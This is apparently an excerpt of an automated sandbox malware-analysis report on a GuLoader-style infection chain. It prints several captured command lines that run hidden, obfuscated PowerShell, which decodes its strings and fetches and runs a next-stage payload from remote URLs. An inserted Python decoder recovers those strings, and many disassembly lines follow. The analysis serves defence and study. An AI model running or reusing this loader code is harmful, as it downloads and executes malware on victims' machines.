              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Radiosender='Sub';$Radiosender+='strin';$Knnest = 1;$Radiosender+='g';Function Beshout($Solurenes){$Strejftogters=$Solurenes.Length-$Knnest;For($Overskringers=5;$Overskringers -lt $Strejftogters;$Overskringers+=6){$Neodadaism+=$Solurenes.$Radiosender.Invoke( $Overskringers, $Knnest);}$Neodadaism;}function Lovbundnes($Yttria){ . ($Afskalningernes) ($Yttria);}$Piggy=Beshout 'MrtelM Kr.dotcknozOversi .alil.angslI traa Woma/Hjemm5Ustem.Battl0Byudv Fr,g( ndeWHaandiSkrannTankrdForgroAdvokwAtropsPiske Pne mNpandoT.tuts bane1 dap0 Copy.Sei.m0 Nyre;Procu ,ropWPr,exifleyenmonta6Dou l4 Dri,;S bco TorvexUafvr6Kooke4Rep.e;Ensur AfrakrtingsvEcaud:.rtho1Tele,2Micro1,punk.Dvelr0compl)Duboi UnameG .dskeFreskcdesidkForumoS.fte/Rd,pr2Kbenh0Indre1Topvi0Vaag.0Charl1Batho0Rever1Aureg encodF Bel iDvrgtrBastieK,ydsfIndlgohemicxsigna/ac,ep1 odvi2.jalt1vandf.Hulen0,ates ';$Formaliaers=Beshout 'fugtpUSkiljs.ippeeSlivorKnobk-GldesANonirgCoxiee Lag nIdenttPo.ku ';$Gem=Beshout 'Opadgh ValgtDivertcountpFortssRigm.:Be,po/vr.ss/NeoterMetheaPyramm Borti ZikkrManyreFunktx,awmi.Foredr Treso Afpu/antirRTradeu.omatt.seudsIndevcGimpmhast,re No.fbLkk,raFyrstndokhmeRecresR leg.ZabraqJustuxMidvedMinco ';$Morsomhedernes78=Beshout ' Pli.>Bemr, ';$Afskalningernes=Beshout 'Cou,tiBombaeFor,lx,obbe ';$Uniformerne='Requisites';$Generaliserede135 = Beshout 'Mn treSildecDynamhFremfo Herr Shri%Udrk a F,nspSyc.ppPasswdBadesaKok etBro,eaNedry%Stand\Skan,MBal.ie Preft istaaKrngecBidraaKlororSeashpBe hiaUlulalIleossPloto.FordoTFoto oSea akRepre Rumfr&.ltfo&Proce ViolieSeer,cInterh tdfaoT,lst Pomatt Flle ';Lovbundnes (Beshout 'Manip$NetstgDuromlCountoDeathbSalgsaStor.lSuper:AlloyBB nbrlSpe.la Linif Oketf Pro,eHals,rSydvee Kla.nAtlas=Rangl(BrokkcMal,kmAcftsdErrat Polit/GiantcDesm. 
usdy$B kagGPer.eeUro.tn fleteczardrPretea VaerlBuff,i KorpsFinureBre.srLderveSloucdR.gnbeBando1Ordna3 I,el5Fre,s) Bowl ');Lovbundnes (Beshout 'Kilde$ VaaggHumoul trusoCom,ebPagurakritelBynrt:TorsoMSkibsa derasGuimpsCentiaSenagcSuctirForhaeemmagd Cade= Amor$CardiG AvlseAcidbmChr.s.DronnsSmaltpLevnel ChariChinctBurme( Goni$BowldM.angeoS,mmer issisSterooS,vermProfihFanemeBeggadDrakme Xemer.erienextraeKonomsS.per7 amle8Verde)Kaf,e ');$Gem=$Massacred[0];$Benzyls= (Beshout ' Four$Brn gg D ggl RokaoCoarcbH.ndgaSamlel.ilgo: ReflG DispeAmar n AvereIoretr opt,iHoos c Mi daAfkrflUnderlPorceyHyper= .estNSortle RatgwSlhun-SinliO RacebDaabsjHalsseStandc lokbt .yra TilbaS Dolpyu.sprsKvag tTri,ee ResimBashe.EllarNChemie.yskutTriam.prevoW,nisoeko orbDisedCChevel routi.rende orinnBalitt');$Benzyls+=$Blafferen[1];Lovbundnes ($Benzyls);Lovbundnes (Beshout '.esen$AkuleGStratePneumn paceebe olrJut.si carmcBe.tya JnanlEmbr lTerraySjamb.FyrsvH ,evie nfela U lndH.ctoeAnteprKon asLevne[Tilst$ ,nseFBellioUnderr Ravem,reagaKo,iflOverdiTerkeaFreshe Unr r Cra.sAmour]Forch=Tvely$Ko edPCountiForstgAbonng TordyTroll ');$Cla
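Both PowerShell stages above hide their strings the same way: a helper (Sortkridtstegningens in the cmd.exe chain, Beshout in the wscript.exe chain) builds the method name "Substring" by concatenation, then walks each literal from index 5 in steps of 6, stopping one character before the end, and keeps one character per step, so five of every six characters are filler drawn from a Danish/English word list. A second helper (Caprellidae / Lovbundnes) invokes whatever `$Fligene` / `$Afskalningernes` decodes to. The script below is an added example, not part of the Joe Sandbox report or of the sample, that recovers the helper name, start offset, step and trim from the script text and decodes the literals assigned to variables. The two inputs are excerpts copied from the captured command lines above (only the decoder definition and a few assignments are kept). Literals whose filler contained non-ASCII characters do not decode cleanly from this page because extraction dropped those characters (the long `$festdragtens` / `$Piggy` literal is one such case), so they are left out of the excerpts.

```python
"""Recover the stride-obfuscated string literals of the GuLoader PowerShell stages.

Added example; not the report's or the sample's own code. The scheme is read off
the two captured command lines: Substring($i, 1) for $i = start, start+step, ...
while $i -lt ($s.Length - trim). Helper name and parameters are parsed from the
script rather than hard-coded so the same code handles both stages.
"""
import re
from typing import Dict, Tuple

# Constructed inputs: excerpts copied from the two captured command lines above.
STAGE_ONE_CMD = (
    "$Antigyrous='S';$Antigyrous+='ubs';$Antigyrous+='tri';$Disseizure = 1;"
    "$Antigyrous+='ng';Function Sortkridtstegningens($Udlossende){"
    "$Makah=$Udlossende.Length-$Disseizure;For($Vaesentligheden206=5;"
    "$Vaesentligheden206 -lt $Makah;$Vaesentligheden206+=6){"
    "$Vrdiomraades+=$Udlossende.$Antigyrous.Invoke( $Vaesentligheden206, $Disseizure);}"
    "$Vrdiomraades;}function Caprellidae($Kondenseret){ & ($Fligene) ($Kondenseret);}"
    "$Lrredskjolernes=Sortkridtstegningens ' ScleUSpn.msRepedeEne gr Mell-UndreA"
    "FluidgFors.eAndennsupert Brav ';"
    "$hypermnesia=Sortkridtstegningens 'SemiahSlangtLoosstLage.p Pnhe:Xwfin/Dummk/"
    "Polym1 C,pt9Thges4Elect.inval5Repet9 Eksa. Mugg3ligro0 Thom.Bevge6Gulli/M.nkeU"
    " SagrnTr lacInk,tobeanfmAarsaiSandscLaiba.LandgmBombedFingepForly ';"
    "$Aktiveret=Sortkridtstegningens 'Freqe>fredn ';"
    "$Fligene=Sortkridtstegningens ' Molyi ForheTopsax pers ';"
)
STAGE_TWO_CMD = (
    "$Radiosender='Sub';$Radiosender+='strin';$Knnest = 1;$Radiosender+='g';"
    "Function Beshout($Solurenes){$Strejftogters=$Solurenes.Length-$Knnest;"
    "For($Overskringers=5;$Overskringers -lt $Strejftogters;$Overskringers+=6){"
    "$Neodadaism+=$Solurenes.$Radiosender.Invoke( $Overskringers, $Knnest);}"
    "$Neodadaism;}function Lovbundnes($Yttria){ . ($Afskalningernes) ($Yttria);}"
    "$Formaliaers=Beshout 'fugtpUSkiljs.ippeeSlivorKnobk-GldesANonirgCoxiee Lag n"
    "IdenttPo.ku ';"
    "$Gem=Beshout 'Opadgh ValgtDivertcountpFortssRigm.:Be,po/vr.ss/NeoterMetheaPyramm"
    " Borti ZikkrManyreFunktx,awmi.Foredr Treso Afpu/antirRTradeu.omatt.seudsIndevc"
    "Gimpmhast,re No.fbLkk,raFyrstndokhmeRecresR leg.ZabraqJustuxMidvedMinco ';"
    "$Afskalningernes=Beshout 'Cou,tiBombaeFor,lx,obbe ';"
)

# Function Name($arg){$limit=$arg.Length-$trimvar;For($i=start;$i -lt $limit;$i+=step)
DECODER_DEF = re.compile(
    r"Function\s+(?P<name>\w+)\(\$(?P<arg>\w+)\)\{"
    r"\$\w+=\$(?P=arg)\.Length-\$(?P<trimvar>\w+);"
    r"For\(\$\w+=(?P<start>\d+);\$\w+ -lt \$\w+;\$\w+\+=(?P<step>\d+)\)"
)


def recover_decoder(cmdline: str) -> Tuple[str, int, int, int]:
    """Return (helper name, start offset, step, trim) parsed from the script text."""
    m = DECODER_DEF.search(cmdline)
    if not m:
        raise ValueError("no stride decoder definition found")
    trim_m = re.search(r"\$" + re.escape(m["trimvar"]) + r"\s*=\s*(\d+)", cmdline)
    trim = int(trim_m.group(1)) if trim_m else 1
    return m["name"], int(m["start"]), int(m["step"]), trim


def stride_decode(literal: str, start: int, step: int, trim: int) -> str:
    """Mirror the PowerShell loop: keep literal[i] for i = start, start+step, ... < len-trim."""
    limit = len(literal) - trim
    return "".join(literal[i] for i in range(start, limit, step))


def decode_literals(cmdline: str) -> Dict[str, str]:
    """Decode every `<helper> '<literal>'` call; keys are the assigned variable names."""
    name, start, step, trim = recover_decoder(cmdline)
    call = re.compile(r"(?:\$(?P<var>\w+)\s*=\s*)?" + re.escape(name) + r"\s+'(?P<lit>[^']*)'")
    decoded: Dict[str, str] = {}
    for n, m in enumerate(call.finditer(cmdline)):
        decoded[m["var"] or f"inline{n}"] = stride_decode(m["lit"], start, step, trim)
    return decoded


if __name__ == "__main__":
    for label, cmd in (("cmd.exe chain", STAGE_ONE_CMD), ("wscript.exe chain", STAGE_TWO_CMD)):
        print(label, recover_decoder(cmd))
        for var, value in decode_literals(cmd).items():
            print(f"  ${var} = {value!r}")
```

The recovered values make the stage readable: `$Fligene` / `$Afskalningernes` decode to the Invoke-Expression alias, so Caprellidae and Lovbundnes are `& iex` / `. iex` wrappers around every later decoded fragment; `$Lrredskjolernes` / `$Formaliaers` is the request header name used together with the `$festdragtens` / `$Piggy` browser user-agent; `$Aktiveret` is the redirect operator; and `$hypermnesia` / `$Gem` is the URL each stage downloads its next payload from. Treat the two URLs as the report's own indicators, recovered from its captured command lines, rather than as anything added here.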
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Antigyrous='S';$Antigyrous+='ubs';$Antigyrous+='tri';$Disseizure = 1;$Antigyrous+='ng';Function Sortkridtstegningens($Udlossende){$Makah=$Udlossende.Length-$Disseizure;For($Vaesentligheden206=5;$Vaesentligheden206 -lt $Makah;$Vaesentligheden206+=6){$Vrdiomraades+=$Udlossende.$Antigyrous.Invoke( $Vaesentligheden206, $Disseizure);}$Vrdiomraades;}function Caprellidae($Kondenseret){ & ($Fligene) ($Kondenseret);}$festdragtens=Sortkridtstegningens ' S.ovMFo,kloBeathzBelavi overlFaciolVictraMictu/Kphje5Krlha.Osteo0 Prin Sove( TiltWLnfreiNa.osnTeg sdWatero,etatwVaskosRegis TrouNswigsTinges Retsa1Intel0 Aspe. Anal0 C oc;P.aya disshWDoliciLa gbnF,ktu6Trska4 g.nz;an ui OmkamxH tto6Forha4 Fine;Hvidg Ring rFlaskvBakka: Uden1Pyroc2 Unmo1Anili.Stil.0 T,ks) dy.t AendrG GuldeWavescIc,erkAdonio El.f/ Scri2Kaily0Signa1Beb,u0Apnea0Ne,tu1Headw0Tre s1Freml TreadFRecoiiJargorApnoeeSnorkfWhiffoLeysex Bioe/Aspar1Fetic2Pseu.1Udstt. Tope0Snic, ';$Lrredskjolernes=Sortkridtstegningens ' ScleUSpn.msRepedeEne gr Mell-UndreAFluidgFors.eAndennsupert Brav ';$hypermnesia=Sortkridtstegningens 'SemiahSlangtLoosstLage.p Pnhe:Xwfin/Dummk/Polym1 C,pt9Thges4Elect.inval5Repet9 Eksa. Mugg3ligro0 Thom.Bevge6Gulli/M.nkeU SagrnTr lacInk,tobeanfmAarsaiSandscLaiba.LandgmBombedFingepForly ';$Aktiveret=Sortkridtstegningens 'Freqe>fredn ';$Fligene=Sortkridtstegningens ' Molyi ForheTopsax pers ';$Opvarmningsmssige='Mongolisms';$Haandvrksbagere = Sortkridtstegningens 'MediceFibe c Escah SmleoDomin Paste% Unp.a DemepChelipDecardSubfla UnactSu.liaUndon%,rmme\TekstI SelvnIndigd droniUdsvisTyknipBraknoOnestsRenteeSkibsdDeempnKog.ieGennesDyingsTh mu. 
A,svAempris Rings Emu, Peng&Skyfo&Pusli SteereaflvncTh.nahSkeleoSideo Alb.mtAftvt ';Caprellidae (Sortkridtstegningens 'sekst$LagergDecimlSpectoAsem bEftera,usiolFlam :WorthRDoms,uKnle ia solnPleathCiviloSnedkbKaroleTyndsnGrasssConch= arve(BloodcRaidemSydyedStrkk Pik p/fjortcPerco Appre$Dial,HKuardaA.olia Lv,an.hyrod,igtov JoshrObtaik Fjersfi.msbSt rtaConsugBe eveGryderUngdoemixyp)Umb.l ');Caprellidae (Sortkridtstegningens 'Opmun$SpildgStilllScienoSpilob nkomaVent lHksun:NondiGResoryHellirGglero HonosOu,pucsvkk oCommep Berei smudc ,ini=Pyr o$Sy,tahUnprayPluc p,uraceSynedrBerigmAe opneryt eAngolsBothiiSkefua Domf.E.gotsBede.pSjofelS.ndiijo.rnthydro(Prokl$ AfleAAmts.kBlomstErodeiAtonav toreNonscr atsaeFor ktCon e)Oscil ');$hypermnesia=$Gyroscopic[0];$Charcia= (Sortkridtstegningens ' Most$Mislig WhirlS,geeoHaandb,olicaZ.omelBoard:M elfSCard.kUdarmiR.ssof FugetImpreeUnanntSinca1 B ll4Noedv=V rboNUndereprojiwSyste-PumpeOBaro.bKlassjHumaneForurcNoncrtEl ct SangvS Vriky DistsTh.wlt,ndsteFilodmkvali.,oderN Exhae Sk,btpleur.O,erpWUn.enePaaklbinverCEndomlamblyiDrillegellynUvet,t');$Charcia+=$Ruinhobens[1];Caprellidae ($Charcia);Caprellidae (Sortkridtstegningens ' S,ri$Ansa.STarikkB.njoiSk rpfRealitKartveVariet Dove1Puggi4Nonve. Ph lHSag,regenteaC erudNdlideSt.nJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Antigyrous='S';$Antigyrous+='ubs';$Antigyrous+='tri';$Disseizure = 1;$Antigyrous+='ng';Function Sortkridtstegningens($Udlossende){$Makah=$Udlossende.Length-$Disseizure;For($Vaesentligheden206=5;$Vaesentligheden206 -lt $Makah;$Vaesentligheden206+=6){$Vrdiomraades+=$Udlossende.$Antigyrous.Invoke( $Vaesentligheden206, $Disseizure);}$Vrdiomraades;}function Caprellidae($Kondenseret){ & ($Fligene) ($Kondenseret);}$festdragtens=Sortkridtstegningens ' S.ovMFo,kloBeathzBelavi overlFaciolVictraMictu/Kphje5Krlha.Osteo0 Prin Sove( TiltWLnfreiNa.osnTeg sdWatero,etatwVaskosRegis TrouNswigsTinges Retsa1Intel0 Aspe. Anal0 C oc;P.aya disshWDoliciLa gbnF,ktu6Trska4 g.nz;an ui OmkamxH tto6Forha4 Fine;Hvidg Ring rFlaskvBakka: Uden1Pyroc2 Unmo1Anili.Stil.0 T,ks) dy.t AendrG GuldeWavescIc,erkAdonio El.f/ Scri2Kaily0Signa1Beb,u0Apnea0Ne,tu1Headw0Tre s1Freml TreadFRecoiiJargorApnoeeSnorkfWhiffoLeysex Bioe/Aspar1Fetic2Pseu.1Udstt. Tope0Snic, ';$Lrredskjolernes=Sortkridtstegningens ' ScleUSpn.msRepedeEne gr Mell-UndreAFluidgFors.eAndennsupert Brav ';$hypermnesia=Sortkridtstegningens 'SemiahSlangtLoosstLage.p Pnhe:Xwfin/Dummk/Polym1 C,pt9Thges4Elect.inval5Repet9 Eksa. Mugg3ligro0 Thom.Bevge6Gulli/M.nkeU SagrnTr lacInk,tobeanfmAarsaiSandscLaiba.LandgmBombedFingepForly ';$Aktiveret=Sortkridtstegningens 'Freqe>fredn ';$Fligene=Sortkridtstegningens ' Molyi ForheTopsax pers ';$Opvarmningsmssige='Mongolisms';$Haandvrksbagere = Sortkridtstegningens 'MediceFibe c Escah SmleoDomin Paste% Unp.a DemepChelipDecardSubfla UnactSu.liaUndon%,rmme\TekstI SelvnIndigd droniUdsvisTyknipBraknoOnestsRenteeSkibsdDeempnKog.ieGennesDyingsTh mu. 
A,svAempris Rings Emu, Peng&Skyfo&Pusli SteereaflvncTh.nahSkeleoSideo Alb.mtAftvt ';Caprellidae (Sortkridtstegningens 'sekst$LagergDecimlSpectoAsem bEftera,usiolFlam :WorthRDoms,uKnle ia solnPleathCiviloSnedkbKaroleTyndsnGrasssConch= arve(BloodcRaidemSydyedStrkk Pik p/fjortcPerco Appre$Dial,HKuardaA.olia Lv,an.hyrod,igtov JoshrObtaik Fjersfi.msbSt rtaConsugBe eveGryderUngdoemixyp)Umb.l ');Caprellidae (Sortkridtstegningens 'Opmun$SpildgStilllScienoSpilob nkomaVent lHksun:NondiGResoryHellirGglero HonosOu,pucsvkk oCommep Berei smudc ,ini=Pyr o$Sy,tahUnprayPluc p,uraceSynedrBerigmAe opneryt eAngolsBothiiSkefua Domf.E.gotsBede.pSjofelS.ndiijo.rnthydro(Prokl$ AfleAAmts.kBlomstErodeiAtonav toreNonscr atsaeFor ktCon e)Oscil ');$hypermnesia=$Gyroscopic[0];$Charcia= (Sortkridtstegningens ' Most$Mislig WhirlS,geeoHaandb,olicaZ.omelBoard:M elfSCard.kUdarmiR.ssof FugetImpreeUnanntSinca1 B ll4Noedv=V rboNUndereprojiwSyste-PumpeOBaro.bKlassjHumaneForurcNoncrtEl ct SangvS Vriky DistsTh.wlt,ndsteFilodmkvali.,oderN Exhae Sk,btpleur.O,erpWUn.enePaaklbinverCEndomlamblyiDrillegellynUvet,t');$Charcia+=$Ruinhobens[1];Caprellidae ($Charcia);Caprellidae (Sortkridtstegningens ' S,ri$Ansa.STarikkB.njoiSk rpfRealitKartveVariet Dove1Puggi4Nonve. Ph lHSag,Jump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Radiosender='Sub';$Radiosender+='strin';$Knnest = 1;$Radiosender+='g';Function Beshout($Solurenes){$Strejftogters=$Solurenes.Length-$Knnest;For($Overskringers=5;$Overskringers -lt $Strejftogters;$Overskringers+=6){$Neodadaism+=$Solurenes.$Radiosender.Invoke( $Overskringers, $Knnest);}$Neodadaism;}function Lovbundnes($Yttria){ . ($Afskalningernes) ($Yttria);}$Piggy=Beshout 'MrtelM Kr.dotcknozOversi .alil.angslI traa Woma/Hjemm5Ustem.Battl0Byudv Fr,g( ndeWHaandiSkrannTankrdForgroAdvokwAtropsPiske Pne mNpandoT.tuts bane1 dap0 Copy.Sei.m0 Nyre;Procu ,ropWPr,exifleyenmonta6Dou l4 Dri,;S bco TorvexUafvr6Kooke4Rep.e;Ensur AfrakrtingsvEcaud:.rtho1Tele,2Micro1,punk.Dvelr0compl)Duboi UnameG .dskeFreskcdesidkForumoS.fte/Rd,pr2Kbenh0Indre1Topvi0Vaag.0Charl1Batho0Rever1Aureg encodF Bel iDvrgtrBastieK,ydsfIndlgohemicxsigna/ac,ep1 odvi2.jalt1vandf.Hulen0,ates ';$Formaliaers=Beshout 'fugtpUSkiljs.ippeeSlivorKnobk-GldesANonirgCoxiee Lag nIdenttPo.ku ';$Gem=Beshout 'Opadgh ValgtDivertcountpFortssRigm.:Be,po/vr.ss/NeoterMetheaPyramm Borti ZikkrManyreFunktx,awmi.Foredr Treso Afpu/antirRTradeu.omatt.seudsIndevcGimpmhast,re No.fbLkk,raFyrstndokhmeRecresR leg.ZabraqJustuxMidvedMinco ';$Morsomhedernes78=Beshout ' Pli.>Bemr, ';$Afskalningernes=Beshout 'Cou,tiBombaeFor,lx,obbe ';$Uniformerne='Requisites';$Generaliserede135 = Beshout 'Mn treSildecDynamhFremfo Herr Shri%Udrk a F,nspSyc.ppPasswdBadesaKok etBro,eaNedry%Stand\Skan,MBal.ie Preft istaaKrngecBidraaKlororSeashpBe hiaUlulalIleossPloto.FordoTFoto oSea akRepre Rumfr&.ltfo&Proce ViolieSeer,cInterh tdfaoT,lst Pomatt Flle ';Lovbundnes (Beshout 'Manip$NetstgDuromlCountoDeathbSalgsaStor.lSuper:AlloyBB nbrlSpe.la Linif Oketf Pro,eHals,rSydvee Kla.nAtlas=Rangl(BrokkcMal,kmAcftsdErrat Polit/GiantcDesm. 
usdy$B kagGPer.eeUro.tn fleteczardrPretea VaerlBuff,i KorpsFinureBre.srLderveSloucdR.gnbeBando1Ordna3 I,el5Fre,s) Bowl ');Lovbundnes (Beshout 'Kilde$ VaaggHumoul trusoCom,ebPagurakritelBynrt:TorsoMSkibsa derasGuimpsCentiaSenagcSuctirForhaeemmagd Cade= Amor$CardiG AvlseAcidbmChr.s.DronnsSmaltpLevnel ChariChinctBurme( Goni$BowldM.angeoS,mmer issisSterooS,vermProfihFanemeBeggadDrakme Xemer.erienextraeKonomsS.per7 amle8Verde)Kaf,e ');$Gem=$Massacred[0];$Benzyls= (Beshout ' Four$Brn gg D ggl RokaoCoarcbH.ndgaSamlel.ilgo: ReflG DispeAmar n AvereIoretr opt,iHoos c Mi daAfkrflUnderlPorceyHyper= .estNSortle RatgwSlhun-SinliO RacebDaabsjHalsseStandc lokbt .yra TilbaS Dolpyu.sprsKvag tTri,ee ResimBashe.EllarNChemie.yskutTriam.prevoW,nisoeko orbDisedCChevel routi.rende orinnBalitt');$Benzyls+=$Blafferen[1];Lovbundnes ($Benzyls);Lovbundnes (Beshout '.esen$AkuleGStratePneumn paceebe olrJut.si carmcBe.tya JnanlEmbr lTerraySjamb.FyrsvH ,evie nfela U lndH.ctoeAnteprKon asLevne[Tilst$ ,nseFBellioUnderr Ravem,reagaKo,iflOverdiTerkeaFreshe Unr r Cra.sAmour]Forch=Tvely$Ko edPCountiForstgAbonng TordyTroll ');$ClaJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Radiosender='Sub';$Radiosender+='strin';$Knnest = 1;$Radiosender+='g';Function Beshout($Solurenes){$Strejftogters=$Solurenes.Length-$Knnest;For($Overskringers=5;$Overskringers -lt $Strejftogters;$Overskringers+=6){$Neodadaism+=$Solurenes.$Radiosender.Invoke( $Overskringers, $Knnest);}$Neodadaism;}function Lovbundnes($Yttria){ . ($Afskalningernes) ($Yttria);}$Piggy=Beshout 'MrtelM Kr.dotcknozOversi .alil.angslI traa Woma/Hjemm5Ustem.Battl0Byudv Fr,g( ndeWHaandiSkrannTankrdForgroAdvokwAtropsPiske Pne mNpandoT.tuts bane1 dap0 Copy.Sei.m0 Nyre;Procu ,ropWPr,exifleyenmonta6Dou l4 Dri,;S bco TorvexUafvr6Kooke4Rep.e;Ensur AfrakrtingsvEcaud:.rtho1Tele,2Micro1,punk.Dvelr0compl)Duboi UnameG .dskeFreskcdesidkForumoS.fte/Rd,pr2Kbenh0Indre1Topvi0Vaag.0Charl1Batho0Rever1Aureg encodF Bel iDvrgtrBastieK,ydsfIndlgohemicxsigna/ac,ep1 odvi2.jalt1vandf.Hulen0,ates ';$Formaliaers=Beshout 'fugtpUSkiljs.ippeeSlivorKnobk-GldesANonirgCoxiee Lag nIdenttPo.ku ';$Gem=Beshout 'Opadgh ValgtDivertcountpFortssRigm.:Be,po/vr.ss/NeoterMetheaPyramm Borti ZikkrManyreFunktx,awmi.Foredr Treso Afpu/antirRTradeu.omatt.seudsIndevcGimpmhast,re No.fbLkk,raFyrstndokhmeRecresR leg.ZabraqJustuxMidvedMinco ';$Morsomhedernes78=Beshout ' Pli.>Bemr, ';$Afskalningernes=Beshout 'Cou,tiBombaeFor,lx,obbe ';$Uniformerne='Requisites';$Generaliserede135 = Beshout 'Mn treSildecDynamhFremfo Herr Shri%Udrk a F,nspSyc.ppPasswdBadesaKok etBro,eaNedry%Stand\Skan,MBal.ie Preft istaaKrngecBidraaKlororSeashpBe hiaUlulalIleossPloto.FordoTFoto oSea akRepre Rumfr&.ltfo&Proce ViolieSeer,cInterh tdfaoT,lst Pomatt Flle ';Lovbundnes (Beshout 'Manip$NetstgDuromlCountoDeathbSalgsaStor.lSuper:AlloyBB nbrlSpe.la Linif Oketf Pro,eHals,rSydvee Kla.nAtlas=Rangl(BrokkcMal,kmAcftsdErrat Polit/GiantcDesm. 
usdy$B kagGPer.eeUro.tn fleteczardrPretea VaerlBuff,i KorpsFinureBre.srLderveSloucdR.gnbeBando1Ordna3 I,el5Fre,s) Bowl ');Lovbundnes (Beshout 'Kilde$ VaaggHumoul trusoCom,ebPagurakritelBynrt:TorsoMSkibsa derasGuimpsCentiaSenagcSuctirForhaeemmagd Cade= Amor$CardiG AvlseAcidbmChr.s.DronnsSmaltpLevnel ChariChinctBurme( Goni$BowldM.angeoS,mmer issisSterooS,vermProfihFanemeBeggadDrakme Xemer.erienextraeKonomsS.per7 amle8Verde)Kaf,e ');$Gem=$Massacred[0];$Benzyls= (Beshout ' Four$Brn gg D ggl RokaoCoarcbH.ndgaSamlel.ilgo: ReflG DispeAmar n AvereIoretr opt,iHoos c Mi daAfkrflUnderlPorceyHyper= .estNSortle RatgwSlhun-SinliO RacebDaabsjHalsseStandc lokbt .yra TilbaS Dolpyu.sprsKvag tTri,ee ResimBashe.EllarNChemie.yskutTriam.prevoW,nisoeko orbDisedCChevel routi.rende orinnBalitt');$Benzyls+=$Blafferen[1];Lovbundnes ($Benzyls);Lovbundnes (Beshout '.esen$AkuleGStratePneumn paceebe olrJut.si carmcBe.tya JnanlEmbr lTerraySjamb.FyrsvH ,evie nfela U lndH.ctoeAnteprKon asLevne[Tilst$ ,nseFBellioUnderr Ravem,reagaKo,iflOverdiTerkeaFreshe Unr r Cra.sAmour]Forch=Tvely$Ko edPCountiForstgAbonng TordyTroll ');$Cla
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW, 16_2_004044A4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_0466E3B0 push eax; retf 6_2_0466E3B1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_0466B228 pushad ; ret 6_2_0466B235
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_0466B2BF push eax; ret 6_2_0466B2C0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_046633D5 push eax; retf 6_2_046633F9
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_0466FE02 push esp; retf 6_2_0466FE09
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_073C0638 push eax; mov dword ptr [esp], ecx 6_2_073C0AC4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_073C0AAC push eax; mov dword ptr [esp], ecx 6_2_073C0AC4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_073CF8A0 pushfd ; iretd 6_2_073CF8A1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_09D601D5 push ecx; ret 6_2_09D601D6
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_09D641F5 push esp; ret 6_2_09D641F6
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_09D641E4 push ecx; ret 6_2_09D641EA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_09D62DE2 push ecx; ret 6_2_09D62DEA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_09D65197 push edx; ret 6_2_09D651C6
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_09D62993 push eax; ret 6_2_09D629BA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_09D60185 push eax; ret 6_2_09D60186
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_09D649B0 push eax; ret 6_2_09D649B2
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_09D625AC push eax; ret 6_2_09D625AE
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_09D609AD push es; ret 6_2_09D609B0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_09D6415B push eax; ret 6_2_09D64162
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_09D62147 push eax; ret 6_2_09D62172
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_09D6354B push eax; ret 6_2_09D63552
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_09D63D49 push eax; ret 6_2_09D63D52
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_09D6491D push eax; ret 6_2_09D64932
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_09D60118 push esp; ret 6_2_09D6011E
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_09D61101 push esp; ret 6_2_09D61102
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_09D6050F push eax; ret 6_2_09D60522
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_09D6550B push ecx; ret 6_2_09D65512
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_09D65131 push esp; ret 6_2_09D65132
